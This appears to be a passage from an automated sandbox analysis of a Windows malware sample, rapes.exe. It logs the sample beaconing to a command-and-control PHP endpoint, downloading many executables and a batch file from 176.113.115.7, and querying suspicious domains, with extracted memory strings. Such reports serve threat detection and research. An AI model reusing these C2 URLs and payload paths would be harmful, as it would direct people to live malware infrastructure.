Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2520Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1424Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 15_2_00D605B0 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,

15_2_00D605B0

Source: global traffic	HTTP traffic detected: GET /files/6098950268/cuFIzyH.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/5153162918/P2SXMuh.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/541893478/0uzaP1a.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/5169948862/6z1l5Yn.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/1431323958/8p5Lrev.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/5765828710/7T7bCyA.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/6989783370/ClhN6R8.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/6691015685/EJmAkGq.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/teamex_support/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/6989783370/ClhN6R8.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Mon, 10 Mar 2025 16:49:46 GMTIf-None-Match: "f4400-62fffc27738b8"
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/6098950268/cuFIzyH.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sun, 09 Mar 2025 15:29:56 GMTIf-None-Match: "1c8000-62fea87283677"
Source: global traffic	HTTP traffic detected: GET /files/7098980627/mAtJWNv.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/7212159662/HmngBpR.exe HTTP/1.1Host: 176.113.115.7

Source: global traffic	DNS traffic detected: DNS query: defaulemot.run
Source: global traffic	DNS traffic detected: DNS query: featureccus.shop
Source: global traffic	DNS traffic detected: DNS query: mrodularmall.top
Source: global traffic	DNS traffic detected: DNS query: garagedrootz.top
Source: global traffic	DNS traffic detected: DNS query: jowinjoinery.icu
Source: global traffic	DNS traffic detected: DNS query: begindecafer.world
Source: global traffic	DNS traffic detected: DNS query: modelshiverd.icu
Source: global traffic	DNS traffic detected: DNS query: arisechairedd.shop
Source: global traffic	DNS traffic detected: DNS query: catterjur.run
Source: global traffic	DNS traffic detected: DNS query: orangemyther.live
Source: global traffic	DNS traffic detected: DNS query: fostinjec.today
Source: global traffic	DNS traffic detected: DNS query: sterpickced.digital
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: legenassedk.top
Source: global traffic	DNS traffic detected: DNS query: htardwarehu.icu
Source: global traffic	DNS traffic detected: DNS query: cjlaspcorne.icu
Source: global traffic	DNS traffic detected: DNS query: bugildbett.top
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: latchclan.shop
Source: global traffic	DNS traffic detected: DNS query: absoulpushx.life

Source: unknown

HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: rapes.exe, 0000000F.00000002.3750226935.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3750226935.00000000062BF000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.0000000001743000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.000000000173D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php0H
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php6H
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpSS
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/1431323958/8p5Lrev.exe5t
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/1431323958/8p5Lrev.exeot
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5153162918/P2SXMuh.exe
Source: rapes.exe, 0000000F.00000002.3742343881.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5153162918/P2SXMuh.exekW3
